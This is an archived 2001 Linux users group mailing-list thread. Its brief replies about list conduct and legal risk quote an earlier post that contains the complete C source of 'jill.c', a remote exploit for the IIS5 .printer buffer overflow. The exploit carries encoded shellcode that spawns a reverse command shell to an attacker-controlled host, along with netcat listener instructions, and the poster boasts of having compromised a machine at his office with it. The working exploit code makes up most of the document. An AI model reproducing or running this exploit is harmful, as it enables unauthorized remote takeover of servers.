NPO Bylaws: was Re: just incase you missed it

Eric Richardson plug-discuss@lists.PLUG.phoenix.az.us
Tue, 08 May 2001 07:44:18 -0700


Hi,
Here is an area that needs to be considered for the mission and the
bylaws of the NPO in creation. Principles and philosophy on conduct and
what can and can't be done for the betterment of the organization needs
to be spelled out.

How you approach advocacy and education is very important as is shown in
this thread.
Eric

George Toft wrote:
> 
> In the interest of maintaining a professional list, and a professional
> image, I would appreciate this type of posting not continue.  It has no
> place here.  There are plenty of sites out there where we can get this
> stuff if we were so inclined.  Highlighting Microsoft's inability to
> patch the same overflow from one IIS version to the next does not
> favorably promote Linux at all - in fact, it continues the negative
> "Hacker OS" image that so many are working to overcome.
> 
> Perhaps I'm showing my age, but I don't see how making some underpaid[1]
> NT admin's life miserable by "0wning hiz b0x with a r00t wind0w" does
> him any good.  Sure, he looks like a moron to his boss, and they'll
> patch the OS (if they're lucky[2]), or pay some overpaid MCSE shyster to
> do it for them.
> 
> It also does not reflect well on you, as all you are doing is passing
> on someone else's work, just like a script-kiddie.  This post would be
> educational if you were to disassemble the embedded hex in unsigned
> char sploit and discuss in detail how and why it works.  (Not simply
> "it overruns the print buffer and sends me a console" - I got that much
> from the SANS and Security Portal e-mails.)
> 
> Anyone considering using this code might want to consider the
> ramifications of the Computer Fraud and Abuse Act[3].  Personally, I
> have more ambition than becoming Bubba's newest conquest.
> 
> Yes, I was offended.
> 
> George
> 
> References:
> 1. SANS Salary Survey,
> http://www.sans.org/newlook/publications/salary2000.htm, note 10.
> 2.  Security Portal,
> http://securityportal.com/articles/ntspseven20010507.html
> 3.  Computer Fraud and Abuse Act, 18 U.S.C. § 1030
> 
> Nigel Sollars wrote:
> 
> >  Hi,
> >
> >  Just incase you missed this one here is the jill code .. the IIS5 printer
> > overflow exploit ...
> >
> > Ive done a box here at the office .. hehe brings the term got root? to a
> > reality.
> >
> > Nige..
> >
> > code as follows :-
> >
> >  IIS 5 remote .printer overflow. "jill.c" (don't ask).
> >                         *
> >                         * by: dark spyrit <dspyrit@beavuh.org>
> >                         *
> >                         * respect to eeye for finding this one - nice work.
> >                         * shouts to halvar, neofight and the beavuh bitchez.
> >                         *
> >                         * this exploit overwrites an exception frame to control eip and get to
> >                         * our code.. the code then locates the pointer to our larger buffer and
> >                         * execs.
> >                         *
> >                         * usage: jill <victim host> <victim port> <attacker host> <attacker port>
> >                         *
> >                         * the shellcode spawns a reverse cmd shell.. so you need to set up a
> >                         * netcat listener on the host you control.
> >                         *
> >                         * Ex: nc -l -p <attacker port> -vv
> >                         *
> >                         * I haven't slept in years.
> >                         */
> >
> >                         #include <sys/types.h>
> >                         #include <sys/time.h>
> >                         #include <sys/socket.h>
> >                         #include <netinet/in.h>
> >                         #include <arpa/inet.h>
> >                         #include <unistd.h>
> >                         #include <errno.h>
> >                         #include <stdlib.h>
> >                         #include <stdio.h>
> >                         #include <string.h>
> >                         #include <fcntl.h>
> >                         #include <netdb.h>
> >
> >                         int main(int argc, char *argv[]){
> >
> >                           /* the whole request rolled into one, pretty huh? carez. */
> >
> >                           unsigned char sploit[]=
> >                             "\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x69\x6e\x74\x65\x72\x20"
> >                             "\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x42\x65\x61\x76\x75\x68\x3a\x20"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
> >                             "\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
> >                             "\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
> >                             "\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
> >                             "\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
> >                             "\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
> >                             "\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
> >                             "\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
> >                             "\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
> >                             "\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
> >                             "\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
> >                             "\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
> >                             "\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
> >                             "\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
> >                             "\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
> >                             "\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
> >                             "\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
> >                             "\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
> >                             "\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
> >                             "\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
> >                             "\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
> >                             "\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x5e\x38\x4c\xb3"
> >                             "\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
> >                             "\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
> >                             "\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
> >                             "\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
> >                             "\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
> >                             "\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
> >                             "\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
> >                             "\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
> >                             "\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
> >                             "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
> >                             "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
> >                             "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
> >                             "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
> >                             "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
> >                             "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
> >                             "\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
> >                             "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
> >                             "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
> >                             "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
> >                             "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
> >                             "\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> >                             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33"
> >                             "\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0"
> >                             "\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a";
> >
> >                           int s;
> >                           unsigned short int a_port;
> >                           unsigned long a_host;
> >                           struct hostent *ht;
> >                           struct sockaddr_in sin;
> >
> >                           printf("iis5 remote .printer overflow.\n"
> >                             "dark spyrit <dspyrit@beavuh.org> / beavuh labs.\n");
> >
> >                           if (argc != 5){
> >                             printf("usage: %s <victimHost> <victimPort> <attackerHost> <attackerPort>\n",argv[0]);
> >                             exit(1);
> >                           }
> >
> >                           if ((ht = gethostbyname(argv[1])) == 0){
> >                             herror(argv[1]);
> >                             exit(1);
> >                           }
> >
> >                           sin.sin_port = htons(atoi(argv[2]));
> >                           a_port = htons(atoi(argv[4]));
> >                           a_port^=0x9595;
> >
> >                           sin.sin_family = AF_INET;
> >                           sin.sin_addr = *((struct in_addr *)ht->h_addr);
> >
> >                           if ((ht = gethostbyname(argv[3])) == 0){
> >                             herror(argv[3]);
> >                             exit(1);
> >                           }
> >
> >                           a_host = *((unsigned long *)ht->h_addr);
> >                           a_host^=0x95959595;
> >
> >                           sploit[441]= (a_port) & 0xff;
> >                           sploit[442]= (a_port >> 8) & 0xff;
> >
> >                           sploit[446]= (a_host) & 0xff;
> >                           sploit[447]= (a_host >> 8) & 0xff;
> >                           sploit[448]= (a_host >> 16) & 0xff;
> >                           sploit[449]= (a_host >> 24) & 0xff;
> >
> >                           if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
> >                             perror("socket");
> >                             exit(1);
> >                           }
> >
> >                           printf("\nconnecting... \n");
> >
> >                           if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
> >                             perror("connect");
> >                             exit(1);
> >                           }
> >
> >                           write(s, sploit, strlen(sploit));
> >                           sleep (1);
> >                           close (s);
> >
> >                           printf("sent... \nyou may need to send a carriage on your listener if the shell doesn't appear.\nhave fun!\n");
> >                           exit(0);
> >                         }
> > ________________________________________________
> > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> >
> > PLUG-discuss mailing list  -  PLUG-discuss@lists.PLUG.phoenix.az.us
> > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> 
> --
> "Fate, it seems, is not without a sense of irony" - Morpheus
> 
> ________________________________________________
> See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> 
> PLUG-discuss mailing list  -  PLUG-discuss@lists.PLUG.phoenix.az.us
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss